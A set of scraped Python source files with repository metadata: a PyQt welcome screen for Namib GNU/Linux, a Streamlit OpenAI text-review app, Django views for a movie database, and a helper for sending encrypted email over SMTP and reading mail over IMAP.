self.settingsLayout = QtWidgets.QHBoxLayout()
self.settingsLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.settingsLayout.setObjectName("settingsLayout")
self.languageSelector = QtWidgets.QComboBox(self.MainWidget)
self.languageSelector.setObjectName("languageSelector")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.settingsLayout.addWidget(self.languageSelector)
self.languageSelector.hide()
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.settingsLayout.addItem(spacerItem2)
self.launchAtStartCheck = QtWidgets.QCheckBox(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.launchAtStartCheck.sizePolicy().hasHeightForWidth())
self.launchAtStartCheck.setSizePolicy(sizePolicy)
self.launchAtStartCheck.setLayoutDirection(QtCore.Qt.LeftToRight)
self.launchAtStartCheck.setObjectName("launchAtStartCheck")
######################### LAUNCH AT START BUTTON #########################
self.launchAtStartCheck.clicked.connect(self.startCheckAction)
##########################################################################
self.settingsLayout.addWidget(self.launchAtStartCheck)
self.mainGrid.addLayout(self.settingsLayout, 11, 0, 1, 3)
self.helpButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.helpButton.sizePolicy().hasHeightForWidth())
self.helpButton.setSizePolicy(sizePolicy)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/helpus.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.helpButton.setIcon(icon6)
self.helpButton.setObjectName("helpButton")
######################### HELP BUTTON #########################
self.helpButton.clicked.connect(self.helpButtonAction)
###############################################################
self.mainGrid.addWidget(self.helpButton, 6, 2, 1, 1)
self.newsButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newsButton.sizePolicy().hasHeightForWidth())
self.newsButton.setSizePolicy(sizePolicy)
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/news.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.newsButton.setIcon(icon7)
self.newsButton.setObjectName("newsButton")
######################### NEWS BUTTON ##########################
self.newsButton.clicked.connect(self.newsButtonAction)
################################################################
self.mainGrid.addWidget(self.newsButton, 6, 0, 1, 1)
self.infoLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.infoLabel.sizePolicy().hasHeightForWidth())
self.infoLabel.setSizePolicy(sizePolicy)
self.infoLabel.setScaledContents(True)
self.infoLabel.setWordWrap(True)
self.infoLabel.setObjectName("infoLabel")
self.mainGrid.addWidget(self.infoLabel, 2, 0, 1, 3)
self.gridLayout.addLayout(self.mainGrid, 0, 0, 1, 1)
WelcomeScreen.setCentralWidget(self.MainWidget)
self.retranslateUi(WelcomeScreen)
self.languageSelector.setCurrentIndex(12)
QtCore.QMetaObject.connectSlotsByName(WelcomeScreen)
######################### LIVEUSER ? ##########################
if os.path.isfile("/usr/bin/calamares_polkit"):
self.installButton.setVisible(True)
self.installationLabel.setVisible(True)
###############################################################
######################### IS AUTOSTART ? ######################
homedir = os.path.expanduser('~')
autostartfile = os.path.join(homedir, ".config/autostart/namib-welcome.desktop")
if os.path.isfile(autostartfile):
self.launchAtStartCheck.setChecked(True)
###############################################################
def retranslateUi(self, WelcomeScreen):
_translate = QtCore.QCoreApplication.translate
WelcomeScreen.setWindowTitle(_translate("WelcomeScreen", "Welcome Screen"))
self.wikiButton.setText(_translate("WelcomeScreen", "Wiki"))
self.linksLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">LINKS :</span></p></body></html>"))
self.donateButton.setText(_translate("WelcomeScreen", "Donate"))
self.chatButton.setText(_translate("WelcomeScreen", "Chat room"))
self.installationLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">INSTALLATION :</span></p></body></html>"))
self.installButton.setText(_translate("WelcomeScreen", "Install Now"))
self.welcomeLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\"><span style=\" font-size:18pt; font-weight:600;\">Welcome to Namib GNU/Linux !</span></p></body></html>"))
self.forumsButton.setText(_translate("WelcomeScreen", "Forums"))
self.languageSelector.setCurrentText(_translate("WelcomeScreen", "English"))
self.languageSelector.setItemText(0, _translate("WelcomeScreen", "Albanian"))
self.languageSelector.setItemText(1, _translate("WelcomeScreen", "Arabic"))
self.languageSelector.setItemText(2, _translate("WelcomeScreen", "Asturian (Spain)"))
self.languageSelector.setItemText(3, _translate("WelcomeScreen", "Belarusian"))
self.languageSelector.setItemText(4, _translate("WelcomeScreen", "Bulgarian"))
self.languageSelector.setItemText(5, _translate("WelcomeScreen", "Catalan"))
self.languageSelector.setItemText(6, _translate("WelcomeScreen", "Chinese (China)"))
self.languageSelector.setItemText(7, _translate("WelcomeScreen", "Chinese (Taiwan)"))
self.languageSelector.setItemText(8, _translate("WelcomeScreen", "Croatian"))
self.languageSelector.setItemText(9, _translate("WelcomeScreen", "Czech"))
self.languageSelector.setItemText(10, _translate("WelcomeScreen", "Danish"))
self.languageSelector.setItemText(11, _translate("WelcomeScreen", "Dutch"))
self.languageSelector.setItemText(12, _translate("WelcomeScreen", "English"))
self.languageSelector.setItemText(13, _translate("WelcomeScreen", "French"))
self.languageSelector.setItemText(14, _translate("WelcomeScreen", "German"))
self.languageSelector.setItemText(15, _translate("WelcomeScreen", "Georgian"))
self.languageSelector.setItemText(16, _translate("WelcomeScreen", "Greek (Greece)"))
self.languageSelector.setItemText(17, _translate("WelcomeScreen", "Hebrew"))
self.languageSelector.setItemText(18, _translate("WelcomeScreen", "Hindi (India)"))
self.languageSelector.setItemText(19, _translate("WelcomeScreen", "New Item"))
self.languageSelector.setItemText(20, _translate("WelcomeScreen", "Hungarian"))
self.languageSelector.setItemText(21, _translate("WelcomeScreen", "Icelandic"))
self.languageSelector.setItemText(22, _translate("WelcomeScreen", "Indonesian (Indonesia)"))
self.languageSelector.setItemText(23, _translate("WelcomeScreen", "Italian"))
self.languageSelector.setItemText(24, _translate("WelcomeScreen", "Japanese"))
self.languageSelector.setItemText(25, _translate("WelcomeScreen", "Korean (Korea)"))
self.languageSelector.setItemText(26, _translate("WelcomeScreen", "Lithuanian"))
self.languageSelector.setItemText(27, _translate("WelcomeScreen", "Norwegian Bokmål"))
self.languageSelector.setItemText(28, _translate("WelcomeScreen", "Persian (Iran)"))
self.languageSelector.setItemText(29, _translate("WelcomeScreen", "Polish"))
self.languageSelector.setItemText(30, _translate("WelcomeScreen", "Portuguese (Brazil)"))
self.languageSelector.setItemText(31, _translate("WelcomeScreen", "Portuguese (Portugal)"))
self.languageSelector.setItemText(32, _translate("WelcomeScreen", "Romanian (Romania)"))
self.languageSelector.setItemText(33, _translate("WelcomeScreen", "Russian"))
self.languageSelector.setItemText(34, _translate("WelcomeScreen", "Slovak"))
self.languageSelector.setItemText(35, _translate("WelcomeScreen", "Slovenian (Slovenia)"))
self.languageSelector.setItemText(36, _translate("WelcomeScreen", "Slovenian"))
self.languageSelector.setItemText(37, _translate("WelcomeScreen", "Spanish"))
self.languageSelector.setItemText(38, _translate("WelcomeScreen", "Serbian (Serbia)"))
self.languageSelector.setItemText(39, _translate("WelcomeScreen", "Serbian"))
self.languageSelector.setItemText(40, _translate("WelcomeScreen", "Swedish"))
self.languageSelector.setItemText(41, _translate("WelcomeScreen", "THai"))
self.languageSelector.setItemText(42, _translate("WelcomeScreen", "Turkish (Turkey)"))
self.languageSelector.setItemText(43, _translate("WelcomeScreen", "Turkish"))
self.languageSelector.setItemText(44, _translate("WelcomeScreen", "Ukrainian"))
self.languageSelector.setItemText(45, _translate("WelcomeScreen", "Vietnamese (Viet Nam)"))
self.launchAtStartCheck.setText(_translate("WelcomeScreen", "Launch at start"))
self.helpButton.setText(_translate("WelcomeScreen", "Help us"))
self.newsButton.setText(_translate("WelcomeScreen", "News"))
self.infoLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\">Welcome to Namib GNU/Linux. The links below will help you get started with Namib. So enjoy the experience, and don\'t hesitate to send us your feedback.</p></body></html>"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
WelcomeScreen = QtWidgets.QMainWindow()
ui = Ui_WelcomeScreen()
ui.setupUi(WelcomeScreen)
WelcomeScreen.show()
sys.exit(app.exec_())
| namiblinux/namib-welcome | src/namib-welcome.py | namib-welcome.py | py | 24,467 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "webbrowser.open",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "webbrowser.open",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "webbrowser.open",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "webbrowser.open",
... |
41826551936 | import os
import streamlit as st
import openai
from dotenv import load_dotenv
def load_guidelines(filepath):
with open(filepath, 'r', encoding='utf-8') as f:
return f.read()
def save_guidelines(filepath, content):
with open(filepath, 'w', encoding='utf-8') as f:
f.write(content)
load_dotenv()
api_key = os.getenv("OPENAI_API_KEY")
# print(api_key)
openai.api_key = api_key
def chat_with_model(prompt, guidelines):
messages = [
{"role": "system", "content": guidelines},
{"role": "user", "content": prompt},
{"role": "assistant", "content": ""}
]
response = openai.ChatCompletion.create(
model="gpt-4",
max_tokens=1536,
messages=messages,
temperature=0,
stream=True
)
return response['choices'][0]['message']['content']
# Load Guidelines from a file
guidelines_path = "system.txt" # Replace with your file path
guidelines = load_guidelines(guidelines_path)
# Streamlit App
st.title("OpenAI Chat Assistant for Text Improvement")
with st.expander("Guidelines ein-/ausblenden"):
guidelines = st.text_area("Content Guidelines:", guidelines)
if st.button("Speichern"):
save_guidelines(guidelines_path, guidelines)
# st.write("Bitte geben Sie Ihr Textbeispiel ein.")
user_input = st.text_area("Bitte geben Sie Ihr Textbeispiel ein.")
if user_input:
assistant_reply = chat_with_model(user_input, guidelines)
st.write(f"Assistant: {assistant_reply}")
| fhoeg/textReview_gui | app.py | app.py | py | 1,490 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "openai.ChatCompletio... |
73268729635 | from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect,JsonResponse
from .forms import NameForm
from .models import NameFormModel
import json, os, requests
from datetime import datetime
# Create your views here.
database = []
def moviemanagerView(request):
if request.method == 'POST':
form = NameForm(request.POST)
#year_model = Year(request.POST)
if form.is_valid():
#Not initializing db here, instead storing cleaned data for manipulation
cleanForm = form.cleaned_data
print(cleanForm)
print(type(cleanForm))
#obj = NameFormModel.objects.create(**form.cleaned_data)
movies_json = JsonResponse(cleanForm, safe = False)
#Always have to futz with dates for one reason or another. This prevents the db from having datetime() instead of your actual date.
cleanForm["date_watched_field"] = cleanForm["date_watched_field"].strftime("%m/%d/%Y")
#Check to see if your db already exists, if it doesn't you need to do some more work. If it does you can just continue
if os.path.exists('moviedatabase.json'):
with open('moviedatabase.json') as outfile:
data = json.load(outfile)
if not os.path.exists('moviedatabase.json'):
data = []
data.append(cleanForm)
with open('moviedatabase.json','w') as outfile:
json.dump(data,outfile)
# This is just to show a response to the user. You can render another form here instead of the default form. This is your chance to return a templated list instead but this should get you on the right road.
return HttpResponse(str(data))
#return render (request, 'form.html',{'form':form})
else:
form = NameForm()
return render (request, 'form.html',{'form':form})
def moviemanager(request):
if request.method == 'POST':
form = NameForm(request.POST)
if form.is_valid():
form = NameForm()
#return redirect('home:home')
return render (request, 'form.html',{'form':form})
else:
form = NameForm()
return render (request, 'form.html',{'form':form})
def about_page(request):
page_tile = "About title"
return render(request, "about.html",{"title":page_tile})
def contact_page(request):
contact_title = "Contact title"
return render(request, "contact.html",{"title":contact_title})
| Leeoku/MovieDatabase | moviedb_project/moviemanager/views.py | views.py | py | 2,560 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "forms.NameForm",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.http.JsonResponse",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
23637603147 |
import ssl
import smtplib
import imaplib
from email import encoders
import email
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
import time
import datetime
import traceback
import mylibs.ioprocessing as iop
import re
import os
import socket
socket.setdefaulttimeout(15)
def get_new_to_addr_list(my_addr,msgobj):
# print(msgobj)
cur_to=[]
if 'to' in msgobj:
if msgobj['to']!='':
cur_to=msgobj['to']
# print('to',cur_to)
elif 'To' in msgobj:
if msgobj['To']!='':
cur_to=msgobj['To'].split(',')
# print('To',cur_to)
cur_from=''
if 'from' in msgobj:
cur_to.append(msgobj['from'])
elif 'From' in msgobj:
cur_to.append(msgobj['From']) #.split(',')
# print(cur_to)
try:
cur_to.remove(my_addr)
except:
print()
cur_to.append(cur_from)
return cur_to
def send_input(json_obj , pp, send_file=False, send_public=False, msg_receiver_s='',subj='',sent_msg_cont=''):
# get aliases:
only_return_book=False
if msg_receiver_s!='' or subj!='':
only_return_book=True
addr_alia=iop.print_addr_book(json_obj,only_return_book)
# 1. prompt for subject / or default
# subj='' #iop.input_prompt(propmtstr='\n Enter message subject: ', confirm=True, soft_quite=True)
# 2. prompt for receiver / check key or pass exist ...
if msg_receiver_s=='':
msg_receiver_s=iop.input_prompt(propmtstr='\n Enter receiver address or alias - multiple after comas: ', confirm=False, soft_quite=True)
if msg_receiver_s=='q' or msg_receiver_s=='':
print('Quitting message...')
return '', '', '', ''
# msg_receiver_s=msg_receiver_s.split(',')
msg_receivers_list=msg_receiver_s #[] #msg_receiver.strip().lower()
# for msg_receiver in msg_receiver_s:
# if msg_receiver in addr_alia.keys():
# msg_receivers_list.append(msg_receiver.strip())
# elif '@' in msg_receiver and send_public:
# msg_receivers_list.append(msg_receiver.strip())
# else : # if not full mail try match alias
# print('Extracting alias address...')
# tmp=0
# for kk in addr_alia.keys():
# if addr_alia[kk]==msg_receiver:
# tmp=1
# print('Matched alias '+msg_receiver+' to '+kk)
# msg_receivers_list.append(kk)
# break
print(msg_receivers_list)
if len(msg_receivers_list)==0:
print('...no proper address found - quitting message!...')
return '', '', '', ''
else:
print('Sending to '+str(msg_receivers_list))
same_keys=True
keytype=[]
key=[]
if send_public==False:
pubkeys=iop.gpg_uids()
# "outgoing_encryption_type","outgoing_encryption_key"
for ijk, msg_receiver in enumerate(msg_receivers_list):
if json_obj["outgoing_encryption_type"]=='pgp':
if json_obj["outgoing_encryption_key"] in str(pubkeys):
keytype.append('pgp')
key.append(json_obj["outgoing_encryption_key"])
else:
print('Wrong key '+json_obj["outgoing_encryption_key"]+' for address '+msg_receiver)
print('Available keys: '+str(pubkeys))
return '', '', '', ''
elif json_obj["outgoing_encryption_type"]=='aes256': #msg_receiver in json_obj["address_book"].keys():
keytype.append('aes256')
key.append(json_obj["outgoing_encryption_key"])
else:
print('Address '+msg_receiver+' missing key or password! First add the address to address book using command saveaddr and set proper password for message encryption and decryption.')
return '', '', '', ''
if same_keys and ijk>0:
if keytype[ijk]!=keytype[ijk-1] or key[ijk]!=key[ijk-1]:
same_keys=False
print('[!] Provided addresses have different keys/passwords - will send multiple messages if you continue...')
msg_content=''
if send_public:
subj=iop.input_prompt(propmtstr='\n Enter message subject: ', confirm=True, soft_quite=True) # if empty - quit sending ...
if send_file:
msg_content=iop.select_file(tmppath='my_files')
elif sent_msg_cont!='':
msg_content=sent_msg_cont
else:
# 3. prompt for content -> save to attachment
msg_content=iop.input_prompt(propmtstr='\n Enter message text/content: ', confirm=True, soft_quite=True) # if empty - quit sending ...
if msg_content in ['','q']:
if msg_content=='':
print('Quitting message - empty content...')
else:
print('Quitting message.')
return '', '', '', ''
str_new_id_send=str(0)
new_id_send=0
try:
new_id_send=int(json_obj["send_internal_id"]) +1
str_new_id_send=str( new_id_send )
except:
print()
ret_list=[]
if send_public:
fname='' #os.path.join('archive','sent','sent_'+str_new_id_send+'.txt')
if send_file:
fname=msg_content
# else:
# iop.save_file(fname,msg_content )
ret_list.append([fname, subj, msg_receivers_list, msg_content])
elif same_keys:
ret_list.append([iop.encr_msg(msg_content,keytype[0],key[0],internal_id_str=str_new_id_send), subj, msg_receivers_list, str_new_id_send])
else:
print('msg_content',msg_content)
for ijk in range(len(keytype)):
ret_list.append([iop.encr_msg(msg_content,keytype[ijk],key[ijk],internal_id_str=str_new_id_send), subj, msg_receivers_list[ijk], str_new_id_send])
new_id_send+=1
str_new_id_send=str( new_id_send )
json_obj["send_internal_id"]=str_new_id_send
# iop.saving_encr_cred( json.dumps(json_obj), newest_file, pp)
return ret_list
def prepare_message_email(sender_name, file_attach=[] , subj='', text_part=''):
def_subject='Lorem ipsum ut gravida'
if subj=='':
subj=def_subject
def_content='GDPR protected customer data update.'
if text_part=='':
text_part=def_content
message = MIMEMultipart("alternative") #html
message.set_charset('utf8')
message["Subject"] = subj
message["From"] = sender_name
msgText = MIMEText(text_part, 'plain')
message.attach(msgText)
att_added=0
if len(file_attach)>0:
for file in file_attach:
cas=check_att_size(file)
if len(cas)>20:
print(cas)
continue
h_head,t_tail=os.path.split(file)
part_file = MIMEBase('application', 'octet-stream') #MIMEBase('multipart', 'mixed; name=%s' % t_tail) #MIMEBase('application', 'octet-stream')
part_file.set_payload(open(file, 'rb').read())
encoders.encode_base64(part_file)
part_file.add_header('Content-Disposition', 'attachment; filename="%s"' % t_tail)
message.attach(part_file)
att_added+=1
if att_added==0 and subj==def_subject and text_part==def_content:
return '[!] No attachment - only default content - not sending message... Change message subject or content or add attachment to be able to send.'
return message
def check_att_size(att_file_path,max_bytes=1024*1024*8):
bytes_size = os.path.getsize(att_file_path)
if bytes_size>max_bytes:
return 'Attachment too big. Byte size '+str(bytes_size)+' bigger then max '+str(max_bytes)
else :
return str(bytes_size)
# file attach - place sent files in sent folder in archive - ensure folder exist !
# add method clear attach folder ? clear archive enough
# reply option use the same just enter default email receiver, subject - rest enter manual ...
# def send_email(smpt_cred_dict,receiver_email, file_attach=[] , subj='', text_part=''):
def send_email(smtp_addr,sender_email, password, sender_name, receiver_email, file_attach=[] , subj='', text_part=''):
text_part='GDPR protected customer data update. Part '+text_part
message=prepare_message_email(sender_name, file_attach , subj, text_part)
if type(message)==type('asdf'):
return message
context = ssl.create_default_context() # Create secure connection with server and send email
with smtplib.SMTP_SSL(smtp_addr, 465, timeout=15, context=context) as server:
server.login(sender_email, password)
server.send_message( message, sender_email, receiver_email )
server.close()
return 'Message sent!'
######
##########
#####################################################3
## IMAP:
def msg_cont_extr_pgp(msg_content):
pgp_start='-----BEGIN PGP MESSAGE-----'
pgp_end='-----END PGP MESSAGE-----'
msg_list=[]
if pgp_start in msg_content:
split1=msg_content.split(pgp_start)
for s1 in split1:
if pgp_end in s1:
split2=s1.split(pgp_end)
for s2 in split2:
if len(iop.clear_whites(s2))>1: # check if hites only but save orig! len(s2)>1: #len(iop.clear_whites(s2))>1:
tmpmsg=pgp_start+s2+pgp_end
msg_list.append(tmpmsg)
return msg_list
# if att>0 allow read att for last message? or per id ?
def download_msg_id_att(mail_from , mail_from_pswd , imap_addr, id,att_name='all',attfolder='tmp'): # check if not already downloaded!
print('\n\nDownloading attachments for message ID=['+str(id)+']:\n')
mail=None
try:
mail = imaplib.IMAP4_SSL(imap_addr)
mail.login(mail_from,mail_from_pswd)
mail.select('inbox')
except:
err_track = traceback.format_exc()
return {"Error":err_track}, []
typ, dd = mail.fetch(str(id), '(RFC822)' ) # '(BODY.PEEK[TEXT])'
downl=[]
for response_part in dd:
if isinstance(response_part, tuple):
msg = email.message_from_string(response_part[1].decode('utf-8'))
if msg.is_multipart():
for part in msg.walk():
if 'attachment' in str(part.get('Content-Disposition')).lower(): #part.get_content_type() == 'application/octet-stream':
fname=part.get_filename()
file_name_str=os.path.join(attfolder,id,fname) #os.path.join(attfolder,'id'+id+fname)
if fname!=att_name and att_name.lower()!='all':
continue
print('Downloading file ['+fname+'] ...')
if fname : #and fname.endswith(fileformat):
file_content= part.get_payload(decode=1)
if iop.save_file(file_name_str,file_content,True):
print('... saved to '+file_name_str)
downl.append(file_name_str)
else:
print('Failed to save to '+file_name_str)
else:
print('Wrong attachmentf file format? ['+fname+']')
mail.close()
mail.logout()
print('Downloaded '+str(downl))
return downl
# laos detects attachment files to process
def read_msg_id(mail_from , mail_from_pswd , imap_addr, id) :
mail=None
try:
mail = imaplib.IMAP4_SSL(imap_addr)
mail.login(mail_from,mail_from_pswd)
mail.select('inbox')
except:
err_track = traceback.format_exc()
return {"Error":err_track}, []
# print(id,type(id),str(id))
typ, dd = mail.fetch(str(id), '(RFC822)' ) # '(BODY.PEEK[TEXT])'
printstr='\n\n Message ID=['+str(id)+'] content:\n'
msgraw=''
msghtml=''
files_att=[]
sender_email=''
mail_to=[]
subj=''
date=''
for response_part in dd:
if isinstance(response_part, tuple):
msg = email.message_from_string(response_part[1].decode('utf-8'))
tmpdate=email.utils.parsedate(msg["Date"])
tmpdate=datetime.datetime.fromtimestamp(time.mktime(tmpdate))
tmpdate=tmpdate.strftime('%Y-%m-%d')
subj=msg["Subject"]
date=tmpdate
printstr+='Date: '+tmpdate+' From: '+msg["From"]+' Subject: '+msg["Subject"]+'\n'
sender_email=iop.xtract_email(msg["From"])
# print(msg)
# print(msg["To"])
mail_to=''
if msg["To"]!=None:
mail_to=msg["To"].split(',')
# print(msg["From"],iop.xtract_email(msg["From"]))
# exit()
if msg.is_multipart():
for part in msg.walk():
if part.get_content_type()=='text/plain':
tmp=str(part.get_payload())
msgraw+=tmp
printstr+=tmp+'\n'
elif part.get_content_type()=='text/html':
tmp=str(part.get_payload())
msghtml+=tmp
printstr+=tmp+'\n'
elif 'attachment' in str(part.get('Content-Disposition')).lower():
# part.get_content_type() == 'application/octet-stream':
files_att.append(part.get_filename())
# file_name_datetime_str=file_name.replace(rep_fname,'').replace(rep_fname2,'')
# str_file_date=file_name_datetime_str[0:4]+'-'+file_name_datetime_str[4:6]+'-'+file_name_datetime_str[6:8]
else:
# print('optsdf')
printstr+=str(msg.get_payload())+'\n'
# print(printstr)
mail.close()
mail.logout()
for ij,mm in enumerate(mail_to):
mail_to[ij]=iop.xtract_email(mm).lower()
# raw_msg={"from":"ktostam", "subj":"jakis", "body":body, "attachments":[attname]}
return {"from":sender_email, "subj":subj, "body":msgraw, "attachments":files_att, "body_html":msghtml, "to":mail_to}
# return {"msg_text":msgraw, "msg_html":msghtml, "from":sender_email, "subject":subj, "date":date}, files_att
# return msg_to_process
# tmpdict={ "Date":tmpdate, "From":msg["From"], "Subject":msg["Subject"], "ID":str(i), "Attachments":att_count, "EmailSize":msg_size} #, "Nr":max_iter
def search_incoming(mail_from , mail_from_pswd , imap_addr, def_opt_init={} ):
mail=None
try:
mail = imaplib.IMAP4_SSL(imap_addr)
mail.login(mail_from,mail_from_pswd)
mail.select('inbox')
except:
err_track = traceback.format_exc()
return {"Error":err_track},[]
def_opt={'date_before':'any','date_since':'any', 'from':'any', 'subject':'any', 'last_msg_limit':5, 'only_new':'yes'}
def_opt_set={'date_before':['*','any','all','9912-12-12'], 'date_since':['*','any','all','1912-12-12'], 'from':['*','any','all'], 'subject':['*','all','any']}
def_opt_usr=def_opt.copy() #{'date_before':'2019-09-01','date_since':'any', 'from':'*', 'subject':'any', 'last_msg_limit':5, 'only_new':'no'} #def_opt
## tutaj prompter - user wybier i potwierdza dane ... 6 danych ...
if def_opt_init!={}:
for kk, vv in def_opt_usr.items():
if kk in def_opt_init:
def_opt_usr[kk]=def_opt_init[kk] #overwrite with init value
else: # manual enter values
# print('\nSet mail search params ... ') #,json_obj[kk])
for kk in def_opt_usr.keys():
opt=''
if kk in def_opt_set.keys():
opt=' Options: '+str(def_opt_set[kk])
tmpv=iop.input_prompt('> Enter ['+str(kk)+'] current: ['+str(def_opt_usr[kk])+'] '+opt+' OR end editing [e] : ',False,True)
tmpv=tmpv.strip()
if tmpv=='e':
break
elif tmpv=='':
continue
elif kk=='last_msg_limit':
try:
tmpv=int(tmpv)
except:
# print('Wrong mail search value - should be int number: '+tmpv)
continue
def_opt_usr[kk]=tmpv #propmtstr,confirm=False, soft_quite=False
# print('Mail search params: ', def_opt_usr)
total_str=''
if True: #def_opt_usr!=def_opt:
for kk, vv in def_opt_usr.items():
if kk=='only_new': #,'only_new':['yes','no','y','n']
if vv in ['yes','y']:
total_str+='(UNSEEN) '
elif kk=='last_msg_limit': # def_opt_usr['last_msg_limit']
continue
elif vv not in def_opt_set[kk]: # if not default option:
if vv in ['*','any','all']:
continue
if kk=='date_since':
tmpdate=datetime.datetime.strptime(vv,'%Y-%m-%d')
tmpdate=tmpdate.strftime("%d-%b-%Y")
total_str+='(SENTSINCE {0})'.format(tmpdate)+' '
elif kk=='date_before':
tmpdate=datetime.datetime.strptime(vv,'%Y-%m-%d')
tmpdate=tmpdate.strftime("%d-%b-%Y")
total_str+='(SENTBEFORE {0})'.format(tmpdate)+' '
elif kk=='from':
total_str+='(FROM {0})'.format(vv.strip())+' '
elif kk=='subject':
total_str+='(SUBJECT "{0}")'.format(vv.strip())+' '
# elif kk=='last_msg_limit':
# if vv>1
total_str=total_str.strip()
if total_str=='':
total_str='ALL'
# now seelect top N msg ...
# print('Search string: ['+total_str+']')
ttype, data = mail.search(None, total_str ) #'(SENTSINCE {0})'.format(date), '(FROM {0})'.format(sender_email.strip())
if ttype !='OK':
mail.close()
mail.logout()
return {},[] #'no msg found'
mail_ids = data[0]
id_list = mail_ids.split()
inter_indxi=[int(x) for x in id_list]
# inter_indxi.sort(reverse = True)
inter_indxi.sort( )
msg_to_process={}
# def_opt_usr['last_msg_limit']
max_iter=def_opt_usr['last_msg_limit']
if max_iter<1 or max_iter>len(inter_indxi) or max_iter>999:
max_iter=min(999,len(inter_indxi))
# print('Search [last_msg_limit]<1, setting max '+str(max_iter)+' messages')
# max_iter=999
# in here only return indexes for decryption!
# print('... processing messages ... count ',str(len(inter_indxi)))
iilist=[]
for i in inter_indxi: #[25]
if max_iter<1:
break
# first fetch body structure to count attachments! and email size
typ, dd = mail.fetch(str(i), 'BODYSTRUCTURE' )
att_count=0
msg_size=0
if len(dd)>0: #count att:
# print('\n***'+str(email.message_from_bytes(dd[0] ))+'***\n')
bstr=str(email.message_from_bytes(dd[0] )) #.lower()
tmpstr=bstr.split("\"ATTACHMENT\"") #'attachment')
att_count+=len(tmpstr)-1
# print('att_count',att_count)
# exit()
typ, dd = mail.fetch(str(i), '(RFC822.SIZE)' )
tmps=str(email.message_from_bytes(dd[0] ))
tmps=tmps.replace('(','').replace(')','')
tmps=tmps.split()
if len(tmps)>2:
if 'RFC822.SIZE' in tmps[1]:
# print('size?',tmps[2])
msg_size=tmps[2]
if iop.is_int(msg_size):
msg_size= str( round(float(msg_size)/1024/1024,1) )+' MB'
typ, dd = mail.fetch(str(i), '(BODY.PEEK[] FLAGS)' ) # FIRST READ FLAGS TO RESTORE THEM !
for response_part in dd:
if isinstance(response_part, tuple):
msg = email.message_from_string(response_part[1].decode('utf-8'))
mail_to=''
if msg["To"]!=None:
mail_to=msg["To"] #.split(',')
# print(msg["Date"]+'|'+msg["From"]+'|'+msg["Subject"])
tmpdate=email.utils.parsedate(msg["Date"])
tmpdate=datetime.datetime.fromtimestamp(time.mktime(tmpdate))
tmpdate=tmpdate.strftime('%Y-%m-%d')
iilist.append(max_iter)
